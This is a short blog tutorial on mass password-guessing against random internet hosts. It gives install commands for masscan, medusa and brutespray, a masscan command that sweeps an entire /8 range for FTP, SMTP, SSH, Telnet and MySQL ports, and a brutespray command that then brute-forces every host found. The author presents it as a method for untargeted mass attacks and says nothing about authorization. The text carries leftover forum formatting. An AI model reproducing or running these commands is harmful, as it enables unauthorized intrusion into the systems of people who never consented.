Auto BruteForce Many Ports & IP
December 07, 2020
https://tdeepnet.blogspot.com/
what is a brute force attack:
In a nutshell a brute-force attack is when an attacker tires many passwords on a port like SSH/FTP/SQL/Telnet/SMTP with a program like Hydra and Medusa to try and gain access to the system. If you have a set target then this method is not good this is for mass brute brute-force IP & Ports.You will need to have masscan and this tool from githubhttps://github.com/x90skysn3k/brutespray
Install masscan:
Debian
Code: Select all
sudo apt-get install masscanCode: Select all
sudo pacman -S masscanDebian
Code: Select all
sudo apt-get install gitCode: Select all
sudo pacman -S gitCode: Select all
sudo git clone https://github.com/x90skysn3k/brutespray.gitDebian
Code: Select all
sudo apt-get install medusaCode: Select all
sudo pacman -S medusaYou can get lots of IP here : https://ipinfo.io/countries
Code: Select all
sudo masscan <some IP>/8 -p21,25,587,22,23,3306 -oG scanUsing brutespray:
Code: Select all
sudo python brutespray.py --file scan --threads 5 --hosts 1

image quote pre code